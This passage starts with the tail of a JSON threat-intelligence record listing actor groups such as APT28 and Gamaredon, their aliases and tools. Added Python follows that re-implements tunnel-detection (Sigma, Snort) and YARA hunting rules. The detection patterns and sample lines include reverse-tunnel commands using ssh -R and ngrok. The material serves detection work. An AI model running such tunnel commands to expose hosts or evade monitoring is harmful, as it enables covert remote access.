			"tools": [
				"Aversome infector",
				"BoneSpy",
				"DessertDown",
				"DilongTrash",
				"DinoTrain",
				"EvilGnome",
				"FRAUDROP",
				"Gamaredon",
				"GammaDrop",
				"GammaLoad",
				"GammaSteel",
				"Gussdoor",
				"ObfuBerry",
				"ObfuMerry",
				"PlainGnome",
				"PowerPunch",
				"Pteranodon",
				"Pterodo",
				"QuietSieve",
				"Remcos",
				"RemcosRAT",
				"Remote Manipulator System",
				"Remvio",
				"Resetter",
				"RuRAT",
				"SUBTLE-PAWS",
				"Socmer",
				"UltraVNC"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "dc0eb4da-1f8c-4f2a-9530-62b0efbb1c35",
			"created_at": "2025-08-07T02:03:24.608888Z",
			"updated_at": "2026-04-10T02:00:03.749632Z",
			"deleted_at": null,
			"main_name": "BRONZE GLOBE",
			"aliases": [
				"APT12 ",
				"CTG-8223 ",
				"DyncCalc ",
				"Numbered Panda ",
				"PortCalc"
			],
			"source_name": "Secureworks:BRONZE GLOBE",
			"tools": [
				"Badpuck",
				"BeepService",
				"Etumbot",
				"Gh0st RAT",
				"Ixeshe",
				"Mswab",
				"RAdmin",
				"Seatran",
				"SvcInstaller",
				"Ziyang"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "236a8303-bf12-4787-b6d0-549b44271a19",
			"created_at": "2024-06-04T02:03:07.966137Z",
			"updated_at": "2026-04-10T02:00:03.706923Z",
			"deleted_at": null,
			"main_name": "IRON TILDEN",
			"aliases": [
				"ACTINIUM ",
				"Aqua Blizzard ",
				"Armageddon",
				"Blue Otso ",
				"BlueAlpha ",
				"Dancing Salome ",
				"Gamaredon",
				"Gamaredon Group",
				"Hive0051 ",
				"Primitive Bear ",
				"Shuckworm ",
				"Trident Ursa ",
				"UAC-0010 ",
				"UNC530 ",
				"WinterFlounder "
			],
			"source_name": "Secureworks:IRON TILDEN",
			"tools": [
				"Pterodo"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434092,
	"ts_updated_at": 1775792224,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a7b38b5b8c56a708a410b7ff2a9bbb38d5abdc35.pdf",
		"text": "https://archive.orkl.eu/a7b38b5b8c56a708a410b7ff2a9bbb38d5abdc35.txt",
		"img": "https://archive.orkl.eu/a7b38b5b8c56a708a410b7ff2a9bbb38d5abdc35.jpg"
	}
}
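The "Localhost Tunnel Host Commands (METHODOLOGY)" Sigma rule in the archived text above is only as good as its condition, and the page's copy of that condition is cut off after "(selectionLHRun1 and selec". The following Python is an added example, not Mandiant's code, that re-implements the rule's selections over constructed command lines so the logic can be exercised offline. The groupings after the cut-off point (ssh needs LHRun1 and LHRun2; localtunnel needs selections 1+2 or 3+4+5) are an assumption, and the `contains` checks are treated as case-insensitive, as Sigma's default is. The samples include the UNC2465 pattern from the case study (ngrok renamed to conhost.exe with an ngrok.yml config) to show when the rule does and does not fire, plus one known false positive.

```python
import re

# Regexes copied from the rule's selectionKnownCMDs (unanchored, like Sigma's |re).
KNOWN_CMDS = [
    re.compile(r"ngrok\s+(http|tcp|tls|start)\s+"),
    re.compile(r"lt\s+--port\s+[0-9]{1,5}"),
    re.compile(r"gotunnelme\s+[0-9]{1,5}"),
]
# Substring lists copied from the rule's |contains selections (all lowercase;
# Sigma's contains modifier is case-insensitive by default, so we lowercase input).
NGROK_VERBS = ("http ", "tls ", "tcp ", "start ")
LT_BINARY = ("/lt", "\\lt", " lt")
LT_SCHEME = (" http", " https")
LT_FLAGS = ("-s", "--server", "-h", "--host", "-p", "--port")


def matched_selections(cmdline):
    """Return the set of selection names that fire on one process command line."""
    low = cmdline.lower()
    hits = set()
    if any(p.search(cmdline) for p in KNOWN_CMDS):   # |re is case-sensitive
        hits.add("selectionKnownCMDs")
    if "ngrok" in low:
        hits.add("selectionNgrokProcess")
    if any(v in low for v in NGROK_VERBS):
        hits.add("selectionNgrokCMD")
    if "ssh" in low:
        hits.add("selectionLHRun1")
    if "-r" in low:                                   # "-R" contains, case-insensitive
        hits.add("selectionLHRun2")
    if "localtunnel" in low:
        hits.add("selectionLocalTunnel1")
    if "--port" in low:
        hits.add("selectionLocalTunnel2")
    if any(b in low for b in LT_BINARY):
        hits.add("selectionLocalTunnel3")
    if any(s in low for s in LT_SCHEME):
        hits.add("selectionLocalTunnel4")
    if any(f in low for f in LT_FLAGS):
        hits.add("selectionLocalTunnel5")
    return hits


def is_tunnel_candidate(cmdline):
    """Evaluate the rule condition. The page's condition text stops after
    '(selectionLHRun1 and selec'; the groupings from that point on are an
    ASSUMPTION: ssh needs LHRun1+LHRun2, localtunnel needs 1+2 or 3+4+5."""
    s = matched_selections(cmdline)
    return (
        "selectionKnownCMDs" in s
        or {"selectionNgrokProcess", "selectionNgrokCMD"} <= s
        or {"selectionLHRun1", "selectionLHRun2"} <= s
        or {"selectionLocalTunnel1", "selectionLocalTunnel2"} <= s
        or {"selectionLocalTunnel3", "selectionLocalTunnel4", "selectionLocalTunnel5"} <= s
    )


# Constructed sample command lines (not from the page) with the verdict we expect.
SAMPLE_EVENTS = [
    ("ngrok http 8080", True),
    ("ssh -R 80:localhost:3000 nokey@localhost.run", True),
    ("lt --port 3000", True),
    ("gotunnelme 8080", True),
    # ngrok renamed to conhost.exe (the UNC2465 pattern): nothing says "ngrok", so it slips through
    ("C:\\Users\\bob\\conhost.exe tcp 3389", False),
    # ...unless the ngrok.yml config name appears on the command line
    ("C:\\Users\\bob\\conhost.exe start --config ngrok.yml tunnel1", True),
    ("ssh user@bastion.example.com", False),
    ("python manage.py runserver --port 8000", False),
    # known false positive: an ssh-related line carrying a bare -R flag
    ("rsync -R -e ssh /src host:/dst", True),
]


def run_samples(events=SAMPLE_EVENTS):
    """Apply the rule to each sample; returns [(cmdline, fired)]."""
    return [(cmd, is_tunnel_candidate(cmd)) for cmd, _ in events]


if __name__ == "__main__":
    for cmd, fired in run_samples():
        print(("ALERT " if fired else "      ") + cmd)
```

The renamed-binary case is the practical lesson: the rule keys on the string "ngrok" and on argument shapes, so a renamed agent launched as `conhost.exe tcp 3389` is invisible to it until something else on the command line (here the config file name) gives it away. Pair this rule with the binary-level YARA hunts rather than relying on either alone.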
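Several of the YARA rules above share the same skeleton: a PE or ELF magic check (`uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550`, or `uint32(0) == 0x464c457f`), a filesize cap, and one regex. The Python below is an added example, not Mandiant's code, that re-implements that skeleton for two of the rules, M_Hunting_Win_VPNEngine_PDB_1 (the RSDS PDB-path convention) and M_Hunting_VPNEngine_GenericProxyVPNDomain_1 (the generic proxy/vpn domain), and runs them over constructed buffers built by the helpers at the bottom. The buffers are fabricated test data with a valid MZ/PE header pair, not real binaries, and `\b` is used as an approximation of YARA's `fullword`.

```python
import re
import struct

# $pdb from M_Hunting_Win_VPNEngine_PDB_1: CodeView RSDS record (signature, 16-byte GUID,
# 4-byte age) followed by a drive-letter path whose PDB name contains "vpn" or "proxy".
# YARA "nocase" -> re.IGNORECASE. Lazy quantifiers keep the match on the first RSDS record.
PDB_RE = re.compile(
    rb"RSDS[\x00-\xff]{20}[a-zA-Z]:\\[\x00-\xff]{0,500}?(vpn|proxy)[\x00-\xff]{0,500}?\.pdb\x00",
    re.IGNORECASE,
)
# $UniqueProxyVPNDomain from M_Hunting_VPNEngine_GenericProxyVPNDomain_1:
# a "proxy." or "vpn." label followed by one more label and .net/.com/.org.
DOMAIN_RE = re.compile(rb"(?i)\b(proxy|vpn)\.[^.]{1,100}\.(net|com|org)\b")

FIVE_MB = 5 * 1024 * 1024   # the rules' "filesize < 5MB"


def is_pe(data):
    """uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550: an 'MZ' stub whose
    e_lfanew field (offset 0x3C) points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return len(data) >= e_lfanew + 4 and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def is_elf(data):
    """uint32(0) == 0x464c457f is the little-endian read of the bytes 7f 45 4c 46 ('\\x7fELF')."""
    return data[:4] == b"\x7fELF"


def hunt(data):
    """Evaluate both rules on one file buffer; returns a dict of verdicts."""
    pe, elf = is_pe(data), is_elf(data)
    small = len(data) < FIVE_MB
    return {
        "pe": pe,
        "elf": elf,
        # the PDB rule is Windows-only: PE header required
        "pdb_vpn_or_proxy": pe and small and PDB_RE.search(data) is not None,
        # the domain rule accepts PE or ELF
        "generic_domain": (pe or elf) and small and DOMAIN_RE.search(data) is not None,
    }


def build_fake_pe(payload):
    """Constructed test buffer: a valid MZ/PE header pair in front of arbitrary bytes.
    Not a loadable executable, just enough to satisfy the header checks."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)   # e_lfanew -> offset 0x40
    hdr[0x40:0x44] = b"PE\x00\x00"
    return bytes(hdr) + payload


def build_rsds(pdb_path):
    """Constructed CodeView RSDS record: signature + GUID + age + NUL-terminated path."""
    return b"RSDS" + bytes(range(16)) + struct.pack("<I", 1) + pdb_path + b"\x00"


if __name__ == "__main__":
    sample = build_fake_pe(build_rsds(b"C:\\dev\\myvpnclient\\Release\\client.pdb")
                           + b"\x00connect to vpn.example.com\x00")
    print(hunt(sample))
```

Note what the domain regex will also catch: any legitimate VPN client that embeds its own `vpn.vendor.com` endpoint. That is why the page files these under hunting rather than alerting; the hit is a starting point for triage, not a verdict.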
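The Snort rule under "Ngrok Agent IPs in Network Traffic" is cut off on the page after its second `content:"200` match, so only its anchors are visible: `HTTP/1` at the start of the response and a 200 status. The Python below is an added example, not Mandiant's rule or ngrok's code, that applies the same two anchors to a raw HTTP/1.x response, pulls the origin addresses out of the `ngrok-agent-ips` header, and produces a session label carrying the rule's msg string. The sample responses and addresses are constructed (RFC 5737 documentation ranges); whether the header is present on a given tunnel is the page's claim about free endpoints, not something this code verifies.

```python
import ipaddress

SIG_MSG = "M.Tunneler.HTTP.Ngrok.[response]"   # msg from the page's Snort rule


def parse_status_and_headers(raw_response):
    """Split a raw HTTP/1.x response into (status_code, {lowercased-name: value}).
    Returns (None, {}) unless the buffer starts with an HTTP/1 status line, which is
    the same anchor the Snort rule uses (content:"HTTP/1"; depth:6)."""
    head, _, _ = raw_response.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ", 2)
    if not lines[0].startswith(b"HTTP/1") or len(parts) < 2 or not parts[1].isdigit():
        return None, {}
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower().decode("ascii", "replace")] = \
                value.strip().decode("ascii", "replace")
    return int(parts[1]), headers


def ngrok_agent_ips(raw_response):
    """Origin IPs leaked in ngrok-agent-ips on a 200 response, or [] when absent.
    Tokens that are not valid IP addresses are dropped rather than trusted."""
    status, headers = parse_status_and_headers(raw_response)
    if status != 200 or "ngrok-agent-ips" not in headers:
        return []
    ips = []
    for tok in headers["ngrok-agent-ips"].split(","):
        try:
            ips.append(str(ipaddress.ip_address(tok.strip())))
        except ValueError:
            continue
    return ips


def label_session(tunnel_endpoint, client, raw_response):
    """Emit a session label in the spirit of the Snort alert, or None if no hit."""
    ips = ngrok_agent_ips(raw_response)
    if not ips:
        return None
    return {"msg": SIG_MSG, "tunnel_endpoint": tunnel_endpoint,
            "client": client, "origin_ips": ips}


# Constructed response as a free ngrok endpoint might return it (documentation IPs).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Ngrok-Agent-Ips: 203.0.113.10, 198.51.100.7\r\n"
    b"\r\n"
    b"<html><body>hello</body></html>"
)

if __name__ == "__main__":
    print(label_session("203.0.113.55", "192.0.2.9", SAMPLE_RESPONSE))
```

The origin IPs are the payoff: they tie an otherwise anonymous tunnel endpoint back to the host running the agent, which is exactly what the localhost-tunnel technique is meant to hide.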